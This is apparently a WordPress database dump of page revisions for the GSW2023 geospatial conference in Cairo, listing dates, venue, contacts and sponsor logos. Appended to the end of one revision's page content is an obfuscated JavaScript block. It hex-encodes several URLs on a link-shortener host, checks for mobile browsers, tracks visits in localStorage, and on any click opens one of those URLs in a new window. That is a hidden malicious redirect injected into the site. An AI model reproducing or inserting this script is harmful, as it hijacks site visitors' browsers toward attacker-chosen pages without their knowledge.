src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-29 03:22:03','2023-07-29 03:22:03','',3066,'https://gsw2023.com/?p=5063',0,'revision','',0),
(5064,1,'2023-07-29 03:22:34','2023-07-29 03:22:34','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" 